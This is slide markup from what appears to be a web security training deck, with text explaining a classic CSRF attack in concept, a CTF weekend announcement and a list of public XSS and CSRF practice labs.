              <a:solidFill>
                <a:srgbClr val="24272C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193967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0" y="0"/>
            <a:ext cx="3721001" cy="6858000"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0871A74-CCF7-4C4E-1BED-D443B1E5C692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3961076" y="760985"/>
            <a:ext cx="6447129" cy="5746445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Consider the following classic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>scenario:</a:t>
            </a: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A website has authenticated a user and gave them a session cookie.</a:t>
            </a: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The website contains some functionality for changing a user’s email. The email change requests might  look something like this:</a:t>
            </a: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Now each time the user browses to this app, it “remembers” them.</a:t>
            </a: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effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E33D056-14AE-5D73-871C-973D5A05365A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370558" y="524524"/>
            <a:ext cx="2989117" cy="243717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5834BB2-234E-BDD1-E7AE-CD78CC5E6535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633984" y="1254616"/>
            <a:ext cx="2830735" cy="1195199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4280"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272C"/>
                </a:solidFill>
                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Example - CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24272C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2F12C8-0A3B-4722-9F53-C9F9465C38B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4300208" y="2943125"/>
            <a:ext cx="7312584" cy="2159227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138501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0" y="0"/>
            <a:ext cx="3229817" cy="6858000"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0871A74-CCF7-4C4E-1BED-D443B1E5C692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352613" y="646382"/>
            <a:ext cx="6447129" cy="6413294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>As attackers, we’d li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>ke to abuse this functionality to change the user’s email unwantedly.</a:t>
            </a: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We can make prepare malicious website of our own, that will make that same request to the website:</a:t>
            </a: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Our browser will send the cookies (which including the session id) to the vulnerable website’s server along with our request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>As far as the poorly designed website is concerned, the victim user (identified by their session id) sent a request to change their email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E33D056-14AE-5D73-871C-973D5A05365A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8809470" y="235067"/>
            <a:ext cx="2989117" cy="243717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5834BB2-234E-BDD1-E7AE-CD78CC5E6535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633984" y="1254616"/>
            <a:ext cx="2830735" cy="1195199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4280"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272C"/>
                </a:solidFill>
                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Example - CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24272C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D415EE0-B050-4CA8-A2B3-6BFF1B3D3E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3464719" y="2086547"/>
            <a:ext cx="8505825" cy="2019300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425457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747912" y="1106919"/>
            <a:ext cx="6261812" cy="919482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> Weekend!</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="6500" b="1"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6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69353CBC-8AA8-4716-9ABD-CB3AB4F1A277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="326165" y="1990351"/>
            <a:ext cx="7109775" cy="4450003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A75ADE3E-68C0-4840-9009-D6084A412710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7500253" y="1997495"/>
            <a:ext cx="4627434" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Saturday 30.11, 14:00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Will last for 24 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>No team size limit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Contains beginner friendly challenges</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="2400" b="1" dirty="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102118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2965094" y="4337270"/>
            <a:ext cx="6261812" cy="919482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Practice time</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="6500" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>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4"/>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5"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="819301" y="524291"/>
            <a:ext cx="10585095" cy="520900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E494CD-45EB-20D5-25E7-31FAD1644ECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429250" y="2171772"/>
            <a:ext cx="1333500" cy="1803400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106042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83819" y="1045191"/>
            <a:ext cx="12024361" cy="6978834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/all-labs#cross-site-scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> – High quality XSS labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/all-labs#cross-site-request-forgery-csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> – High quality CSRF labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://xss-game.appspot.com/ - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> - Small XSS game by google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.root-me.org/fr/Challenges/Web-Client/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> - Client side challenges, including XSS and CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://xss.challenge.training.hacq.me/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> - All kinds XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://xss.pwnfunction.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>– DOM XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
